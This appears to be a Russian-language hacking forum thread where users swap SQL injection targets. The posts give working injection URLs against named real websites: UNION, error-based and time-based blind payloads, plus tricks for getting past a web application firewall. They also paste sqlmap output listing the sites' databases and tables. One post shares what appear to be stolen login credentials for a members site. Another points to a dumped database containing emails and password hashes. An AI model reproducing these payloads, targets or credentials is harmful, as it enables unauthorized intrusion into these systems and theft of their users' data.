Code: http://adamslove.org/en-d.php?id=85'+or+1+group+by+mid(version(),rand(0)|0)having+avg(0)%23 MySQL error: 1062 (Duplicate entry '5.5.51-38.2' for key 'group_key') Где ж тут Blind? Или Вы всегда полагаетесь только на sqlmap? И да, там присутствует Mod_security, потому используем нестандартные пробелы и загоняем операторы в комментарии с версией(пример /*!12345union*/%0aselect)!
простите за флуд, но на кой хер выставлять ссылки на уязвимые сайты если ты элементарно не можешь эту уязвимость раскрутить? а теперь по теме: Code: http://www.imrs.rs/index.php?id=-67+union+select+1,2,3,4,5,database(),7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21--
target: http://www.tissueeng.net type: SQL Injection Code: http://www.tissueeng.net/lab/peopleDetail.php?id=-424+/*!50000union*/+/*!50000select*/+1,user(),3,4,5,version(),7--+ user: tissueen_erikp@localhost version: 5.6.32-78.1-log
Spoiler http://www.kandiusa.com/product_list.php?id=1 Database: kandiusa +---------+---------+ | Table | Entries | +---------+---------+ | custom | 8877 | | product | 4703 | | orderm | 3843 | | parts | 597 | | class | 372 | | sort | 76 | | wty | 3 | | admn | 2 | | reg | 1 | +---------+---------+ Spoiler: bd http://www.cambridgesilversmiths.com/browse/detail.php?id=2504 available databases [48]: [*] CamSilWeb [*] Crystal [*] cs_dev_ecommSQL [*] cs_ecommSQL [*] CZOC [*] d2 [*] Data_005 [*] DATA_020 [*] DATA_021 [*] DATA_022 [*] DATA_55 [*] DATA_56 [*] DATA_999_ARCHIVE [*] DATA_ARCHIVE [*] DataLF [*] DemoSynergy [*] distribution [*] EDI_2 [*] EDI_CS_TEMP [*] EEDI_CS [*] FedEx [*] GENTRANDatabase [*] Issues [*] KS_Inbox [*] KS_Object [*] master [*] model [*] msdb [*] msllockdb [*] Northwind [*] pubs [*] PWE [*] Screens [*] Spanish [*] swWorkFlow [*] Synergy [*] TaxTables [*] tempdb [*] Ticketing [*] UPS [*] vendor_dev [*] vendor_test [*] VendorLF [*] vpEDI_Company [*] zWMS_CA [*] zWMS_dev [*] zWMS_PreMigration [*] zWMS_Test_NJ http://www.pinoy-market.com/store.php?id=136 available databases [5]: [*] information_schema [*] mysql [*] ofertas [*] pinoy [*] test http://www.ecgi.de/wp/wp_id.php?id=213 available databases [3]: [*] db1081552-ecgi1 [*] db1081552-ecgi2 [*] information_schema Http://www.kupa.pl/pl/humor.php?id=16 available databases [1]: [*] baza777 // Не надо флудить однообразными сообщениями. // Объединяй в 1 пост, не создавай модераторам лишней работы // ВВ
Code: http://www.immobilien-bender.com/download_blob.php?ID_KATALOG_FILE=99' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a787a71,0x556a6d655550696468517a6654417a59597750744f654b7164566e64624876594f58704345774b72,0x7170706a71),NULL,NULL,NULL,NULL,NULL-- WNxl
http://mycompaniesact.com/orders.php?id=401 Code: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=401' AND 5514=5514 AND 'bTax'='bTax Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=401' AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7170627871,(SELECT (ELT(9875=9875,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'niid'='niid Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=401' AND SLEEP(5) AND 'TmYG'='TmYG Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=401' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627871,0x4975495a54675364526f6847444d55556c714d507361564a62794f486f5242756f6b65674d436f48,0x7162717a71)-- srbU --- web server operating system: Linux Ubuntu web application technology: Apache 2.4.7, PHP 5.5.9 back-end DBMS: MySQL >= 5.0 available databases [24]: [*] cashflow [*] cashflowblog [*] cim [*] complyzone [*] complyzoneblog [*] gstcomplyzone [*] gstseekho [*] gstseekhoapp [*] information_schema [*] mppcos [*] mycompaniesact [*] mycompaniesact_blog [*] mysql [*] performance_schema [*] permier [*] phpmyadmin [*] punitecom [*] rishab [*] sammiraman [*] ssluthra [*] trackmyinvoice [*] uniqueshiksha [*] unocalecom [*] Vendor_Payment_Generation
К сожелению да, не так силен в этом незнаю с чего начать даж Был бы кто научит) http://www.sfgames.ru/gameS.php?id=232 Code: GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=232 AND 5858=5858 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=232 AND SLEEP(5) --- [18:55:32] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.2.17 back-end DBMS: MySQL >= 5.0.12
Code: https://video.bbb.org/vncSearch.php?category=13 UNION ALL SELECT NULL,CONCAT(0x716a6a7671,0x644b4861496f585455585368634d4e6c55486a437768767250584955436345504149454674624f61,0x716a786b71),NULL,NULL,NULL,NULL-- ERFG&bureauId= available databases [3]: [*] bbbvideo [*] information_schema [*] test
Code: http://de.u7buy.com/news/news.html?date=2016-09%' AND 1010=1010 AND '%'=' available databases [1]: [*] u7buy_dbs
Code: http://smmmafia.com/gobig/tnsnfri/rcknrol.php?geo=US' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x6e4e5a72734174575a6f6946495a77786d4142695a6c6b5a594c647a6b6946414657426479557962,0x71767a6b71)-- hajN Есть идеи что за сайт и для чего он?
http://www.vpscro.com/cn/about.php?id=166 Code: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=166 AND 3378=3378 Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: id=166 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171627071,(SELECT (ELT(2938=2938,1))),0x7178627071,0x78))s), 8446744073709551610, 8446744073709551610))) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=166 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: id=-4940 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x794e677a4367776d4c75676a55677158705a414c684b44686c4b67546f545979546e4d636c594a53,0x7178627071),NULL,NULL,NULL,NULL,NULL-- FkYN --- web server operating system: Windows 2008 or Vista web application technology: ASP.NET, PHP 5.5.10, Microsoft IIS 7.0 back-end DBMS: MySQL >= 5.5 available databases [18]: [*] bugtracker [*] dzzoffice [*] eyao [*] hdm0130219_db [*] hdm0580028_db [*] information_schema [*] mysql [*] performance_schema [*] pigcms [*] test [*] tsoa [*] ucenter [*] uchome [*] vp_phpcms [*] vp_xcx [*] vppr [*] wecenter [*] wqjk
Не получается вывести колонки из таблиц, у кого получится скиньте вектор в пм. аккаунты для входа(без них работать не будет) Code: hopkins123:hopkins1 KlausuPirelli:pirelli1 Vishnu24:Ackbar24 momoneyg08:wordupho Code: http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+and+updatexml(NULL,concat(0x3a, ( select database()) ),Null)-- -&template_set=3 XPATH syntax error: ':sitedepth' http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+ OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2)))-- -&template_set=3 Duplicate entry 'sitedepth1' for key 'group_key' tables: userman site_settings users
http://www.golf-in-japan.com/course.php?ID=372 + bd mail hach username [HIDE] https://yadi.sk/i/pxTpczCR3NmKpt [/HIDE] Code: --- Parameter: ID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=372 AND 5008=5008 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ID=372 AND (SELECT 1815 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1815=1815,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: ID=372 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 32 columns Payload: ID=-3043 UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7071,0x6f49475068796d43755072586e44506f504d575573424141775657754b625a7368574a554c6a6678,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uzrc --- web server operating system: Linux Ubuntu 16.04 (xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0 available databases [2]: [*] gij_db [*] information_schema
http://www.odontoprimegroup.com/about.php?id=4 Code: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT) Payload: id=4' OR NOT 9339=9339# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=4' AND SLEEP(5)-- iguT --- web application technology: Apache, PHP 5.4.22 back-end DBMS: MySQL >= 5.0.12 available databases [2]: [*] information_schema [*] odonto_odo
http://remiremont.fr/associations/detail.php?id=68 Code: --- Parameter: id (GET) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=68 OR (SELECT 8037 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(8037=8037,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=68 OR SLEEP(10) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=68 UNION ALL SELECT NULL,CONCAT(0x7176627071,0x674772756c78427a446a6248755a6e67426e6c47675a546e5449546456755a7257426c534b6b7961,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RzWd --- http://gloomysunday.hu/shop.php?id=9 Code: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-7104 OR 6087=6087# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=9 AND (SELECT 5231 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(5231=5231,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=9 OR SLEEP(10) ---
New Jersey State Opera Code: http://www.njstateopera.org/news.php?id=-6+union+select+1,2,version(),4,database(),6,7,user()--
Code: http://www.salut.ru/ViewTopic.php?Id=2325 http://www.salut.aero/info.php view-source:http://www.salut.ru/ViewTopic.php?Id=-2325%27+union+select+1,2,3,user(),5,6,database(),version(),9,10,11,12,13,14,15,16%20--%20ccv | 5.1.67-0ubuntu0.10.04.1 | salut | salut@localhost
